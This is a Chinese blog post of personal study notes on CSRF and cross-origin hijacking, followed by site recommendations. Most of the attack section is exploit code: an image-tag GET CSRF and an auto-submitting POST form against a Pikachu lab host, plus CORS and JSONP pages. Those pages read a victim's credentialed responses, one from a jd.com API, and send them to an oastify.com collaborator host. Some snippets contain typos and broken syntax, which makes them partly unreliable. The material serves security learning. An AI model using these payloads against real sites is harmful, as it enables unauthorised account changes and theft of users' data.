csrf漏洞--笔记

已于 2023-04-09 00:42:50 修改
阅读量179 收藏
点赞数
文章标签: csrf servlet
于 2023-04-09 00:36:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59049258/article/details/130037132
版权

Cross-Site Request Forgery 跨站请求伪造

CSRF的本质:在对方不知情的情况下执行请求

一、正常的CSRF攻击,增删改等操作(基于操作的csrf)

csrf寻找:
    1.关注数据包:数据包的几个关键字段,是否根据cookie来判断请求包
        检查(依次删除判断是否生效): Referer      Auth       CSRFtoken
        Referer:判断数据包来源
        Auth: 
        toten:随机的,一个旧的密码验证这些我们获取不到的
    get请求:构造一个src

<html>
	<body>
		<img src="http://169.234.126.115/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=shanghai&email=vince@qq.com&submit=submit">
	</body>
</html>


    post请求:构造一个表单html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://169.234.126.115/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="boy" />
      <input type="hidden" name="phonenum" value="18626545453" />
      <input type="hidden" name="add" value="cdashgdfhtjsd" />
      <input type="hidden" name="email" value="vince&#64;pikachu&#46;com" />
      <input type="hidden" name="&#32;submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>

      document.forms[0].submit();
    </script>
  </body>
</html>

二、另类的CSRF:jsonp、cors、flash跨域劫持(基于文件读取的csrf)
同源策略:不同源的客户端在没有授权的情况下,不能读取对方资源

由于同源策略的影响,我们需要获取数据,就需要用到跨域
跨域解决方案:jsonp、cors、postMessage

cors:跨源资源共享
    加一个请求头:Origen,对方返回一个响应头:Access-Control-Allow-Orgin。则能拿到对方的资源,不返回响应头即驳回,拿不到资源。

<IDOCTYPE html>
<html>
<head>
<title>CoRS TEST</title>
</head>
<body>
<div id='output'></div>
<script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js">
</script>
<script type="text/javascript">
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open ('get','http://169.234.126.115/CORS/arbitrary_origin.php',true);
//req.setRequestHeader ("Content-Type","application/x-ww-form-urlencoded;");
req.withCredentials = true;
req.send();
function reqListener()
	{
		$.ajax({
		type:'get',
		//ur1:'http://0deg9cdptr1093b91bh6cmsuclic61.burpcollaborator.net',
		url:' http://sgc0f1ngl128774rsop9x2ipxg37rykm9.oastify.com/ ',
		data: JSON.stringify(req.responseText)
});
	};
</script>
</body>
</html>

jsonp:通过script标签加载数据的方式获取数据当作js代码执行(只支持get请求)

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<tit1e>JSONP EXP跨域测试</t1t1e>
</head>
<body onload="load()">
<script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js">
</script>

<script>
function load()
{
$.ajax({

	url:"http://chat1/jd.com/api/checkchat?venderlist=65126.627106callbask=zzzzccc",
	type:"GET"	,		//指定GET请求方法
	dataType:"jsonp",	//指定服务器返回的数据类型
	jsonp:."callback",	//指定参数名称
	jsonpCallback:"zzzzccc",

success:function (data){
$.ajax({
	type:'get',
	url:'htrp://http://sgc0f1ngl128774rsop9x2ipxg37rykm9.oastify.com/',
	data:JSON.stringify(data)
});
}

})
}
</script>
</body>
</html>


    

m0_59049258
关注
WEB安全漏洞之javascript版本漏洞
Agonie_25的博客
05-20 1万+
漏洞说明 在用webinspect或者appscan等工具扫描项目的时候,js版本漏洞(版本过低)是其中比较常见的一个。漏洞说明为:项目使用了存在漏洞jquery版本,可能会导致跨站脚本攻击(XSS)。 修复该漏洞的方法为更新jquery版本,但有一个问题就是,不同的工具扫描的情况也不同,比如在项目中,我们把jqeury版本升级到v1.11.0,webinspect没有扫描出漏洞,但是AWVS则...
Web安全-JQuery框架XSS漏洞浅析
热门推荐
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
解决:jquery-1.11.1.min.js红叉问题
weixin_33978044的博客
06-09 942
工程中导入jquery-1.11.1.min.js,工程正常运行。但是jquery-1.11.1.min.js一直显示红叉。 解决方法如下:     红叉的原因是:myeclipse没有去验证它!     选中js文件,右键Myeclipse--ManaValidation--ExcludeResource--(选中全部或者那个js)    ...
JQuery跨站脚本漏洞
最新发布
qq274575499的博客
04-02 2353
jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
jQuery源码学习(版本1.11)-事件处理-jQuery事件对象
wfbob的专栏
05-24 591
概述 本文详细分析jquery-1.11.1.js源码文件行数:4908~4997; 代码简介:构造函数jQuery.Event用于创建jQuery事件对象实例,jQuery.Event.fn为其原型。jQuery事件对象是jQuery各种事件处理方法中使用的模型,里面对原生事件模型进行了包装,解决了一些兼容性问题,增加了一些属性强化事件对象的功能; 下文进行详细代码分析。 jQu
【基础篇】第03篇:PHP代码审计笔记--CSRF漏洞1
08-03
### PHP代码审计笔记CSRF漏洞详解 #### 一、CSRF漏洞概述 **CSRF**(Cross-Site Request Forgery,跨站请求伪造),是一种针对Web应用的安全威胁。这种攻击方式利用了用户已经登录的会话状态,在用户不知情的情况...
CORS和CSRF--学习笔记
weixin_45951911的博客
12-04 3972
一、CORS 和 CSRF 区别 两者概念完全不同,另外常常我们也会看到 XSS ,这里一起介绍: CORS : Cross Origin Resourse-Sharing 跨站资源共享 CSRF : Cross-Site Request Forgery 跨站请求伪造 XSS : Cross Site Scrit 跨站脚本攻击(为与 CSS 区别,所以在安全领域叫 XSS) 二、CORS 1、概念 跨来源资源共享(CORS),亦译为跨域资源共享,是一份浏览器技术的规范,提供了 Web服
CSRF漏洞剖析
zmzsg100的专栏
12-04 866
CSRF的前世今生
DVWA靶场笔记csrf漏洞原理
Alonegrief的博客
11-20 1347
DVWA漏洞源码分析——(三)csrf Csrf原理: Csrf中文称为跨站请求伪造,利用受害者未失效的身份认证信息(cookie,会话等)诱骗其点击恶意链接或者去访问攻击者构造的含有攻击代码的页面,在受害者不知情的情况下,以受害者的身份向服务器发送请求,从而达到一些非法操作(转账,改密)。 Csrf和xss的攻击方式有点相似,但是不同的是: (1) csrf需要登录后才能操作,xss不需要 (2) csrf是请求页面api来时先非法操作,xss是先当前页面植入js脚本来修改页面内容 例子: 这里我们用dv
CSRF手法-Token在实际项目开发当中的实践
si1ence的博客
01-11 359
0x0 背景 以前做等级保护的时候漏扫经常扫描出来一些网站有CSRF漏洞,经常和开发人员扯皮要怎么改怎么改每次都描述的不清楚经常感觉心累。最近看到OWASP的一本《安全测试指南第四版》的书就随手翻了二页其中谈到了关于会话管理测试的一栏目比较感兴趣就从网上随便下载了一个开源的CMS做一下黑盒测试,练练手万一失业了还能转化写写代码做做测试,过程中发现CMS对于很多表单请求都采用了Token认证做的挺好的于是写个笔记方便日后来看。 0x1 抓包分析 架起代理burpsuit开启准备大干一场,首先找到.
jquery1.11.2
02-24
jQuery JavaScript Library v1.11.2.
Jquery 1.11.2
02-12
Jquery官网下载的Jquery 1.11.2文件,包括jquery-1.11.2.min.js、jquery-1.11.2.min.map和jquery-1.11.2.js,供有需要但网速太慢的童鞋下载
jQuery-1.12.4
03-03
jQuery的版本分为1.x系列和2.x、3.x系列,1.x系列兼容低版本的浏览器,2.x、3.x系列放弃支持低版本浏览器,目前使用最多的是1.x系列的。
jquery-1.11.1.min.js
12-24
绝对放心,快捷方便,保准百分之一百的无毒,接下来不知道说什么了,
解决jquery-1.11.0.js安全漏洞
人与人之间最小的差别是智商,最大的差别是坚持。
12-25 1077
这个文件被扫出安全漏洞有XSS攻击等 ,其中一个比较著名的漏洞是在JQuery 1.6.2版本中发现的。该漏洞被称为”attrFn"漏洞,它允许攻击者通过特殊构造的代码执行任意的JavaScript代码。
jQuery框架漏洞全总结及开发建议
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
【网络安全】jquery版本漏洞如何验证
你在看屏幕的同时,屏幕也在注视着你
05-14 2935
jquery版本漏洞如何验证 首先我们都知道版本漏洞是可以通过升级版本来解决的,这个漏洞也是一样,那么当我们发现了这个漏洞时候应该如何去验证呢? 代码 <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content
jQuery JavaScript Library v1.10.2源码
weixin_30436101的博客
08-28 976
/*! * jQuery JavaScript Library v1.10.2 * http://jquery.com/ * * Includes Sizzle.js * http://sizzlejs.com/ * * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors * R...
C语言笔记:信息安全、Web渗透测试和编程基础
"c语言笔记-信息安全和c语言基础知识" 本资源笔记涵盖了c语言基础知识和信息安全相关的内容。 **信息安全** 信息安全是保护数据的安全,防止未经授权的访问、使用、披露、破坏或修改。2017年,wannacry病毒席卷...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值